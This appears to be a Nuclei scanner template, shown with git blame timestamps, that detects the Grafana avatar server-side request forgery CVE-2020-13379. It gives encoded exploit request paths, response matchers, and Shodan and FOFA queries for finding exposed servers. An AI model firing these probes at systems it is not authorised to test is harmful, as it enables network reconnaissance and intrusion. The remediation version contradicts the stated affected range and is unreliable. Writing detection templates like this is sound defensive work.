2022-12-08 00:39:09 +00:00
id : CVE-2020-13379
info :
2023-04-12 18:18:06 +00:00
name : Grafana 3.0.1-7.0.1 - Server-Side Request Forgery
2022-12-08 00:39:09 +00:00
author : Joshua Rogers
severity : high
2022-12-08 05:36:13 +00:00
description : |
2023-04-12 18:18:06 +00:00
Grafana 3.0.1 through 7.0.1 is susceptible to server-side request forgery via the avatar feature, which can lead to remote code execution. Any unauthenticated user/client can make Grafana send HTTP requests to any URL and return its result. This can be used to gain information about the network Grafana is running on, thereby potentially enabling an attacker to obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
2023-09-27 15:51:13 +00:00
impact : |
An attacker can exploit this vulnerability to bypass security controls, access internal resources, and potentially perform further attacks.
2023-09-06 12:22:36 +00:00
remediation : Upgrade to 6.3.4 or higher.
2022-12-08 00:39:09 +00:00
reference :
- https://github.com/advisories/GHSA-wc9w-wvq2-ffm9
- https://github.com/grafana/grafana/commit/ba953be95f0302c2ea80d23f1e5f2c1847365192
2023-04-03 09:07:37 +00:00
- http://www.openwall.com/lists/oss-security/2020/06/03/4
2023-04-12 18:18:06 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2020-13379
2023-07-11 19:49:27 +00:00
- http://lists.opensuse.org/opensuse-security-announce/2020-06/msg00060.html
2022-12-08 00:39:09 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:H
cvss-score : 8.2
cve-id : CVE-2020-13379
cwe-id : CWE-918
2024-05-31 19:23:20 +00:00
epss-score : 0.71681
epss-percentile : 0.98063
2023-07-11 19:49:27 +00:00
cpe : cpe:2.3:a:grafana:grafana:*:*:*:*:*:*:*:*
2022-12-08 00:39:09 +00:00
metadata :
2023-09-06 12:22:36 +00:00
verified : true
2023-09-01 02:54:41 +00:00
max-request : 2
2023-09-06 12:22:36 +00:00
vendor : grafana
2023-09-01 02:54:41 +00:00
product : grafana
2024-06-07 10:04:29 +00:00
shodan-query :
- title:"Grafana"
- cpe:"cpe:2.3:a:grafana:grafana"
- http.title:"grafana"
fofa-query :
- title="grafana"
- app="grafana"
2024-05-31 19:23:20 +00:00
google-query : intitle:"grafana"
2024-01-14 09:21:50 +00:00
tags : cve2020,cve,grafana,ssrf
2022-12-08 00:39:09 +00:00
2023-04-27 04:28:59 +00:00
http :
2022-12-08 00:39:09 +00:00
- method : GET
path :
- "{{BaseURL}}/avatar/1%3fd%3dhttp%3A%252F%252Fimgur.com%252F..%25252F1.1.1.1"
2023-08-31 17:38:16 +00:00
- "{{BaseURL}}/grafana/avatar/1%3fd%3dhttp%3A%252F%252Fimgur.com%252F..%25252F1.1.1.1"
2022-12-08 00:39:09 +00:00
2023-08-31 17:38:16 +00:00
stop-at-first-match : true
2023-09-06 12:22:36 +00:00
2022-12-08 00:39:09 +00:00
matchers-condition : and
matchers :
- type : word
2022-12-08 05:29:30 +00:00
part : body
2022-12-08 00:39:09 +00:00
words :
- "cloudflare.com"
- "dns"
condition : and
2022-12-08 05:29:30 +00:00
- type : word
part : header
words :
- "image/jpeg"
- type : status
status :
2023-04-12 18:18:06 +00:00
- 200
2024-06-08 16:02:17 +00:00
# digest: 4a0a00473045022100d7b48220ca08733fec2b13608d164c2e93abf97b06b93d172809372c0bd891940220602eb5f02f6b2aada30b7b28ff60a37ac7c0d23fbb5a589f7dddaaa56d6b1803:922c64590222798bb761d5b6d8e72950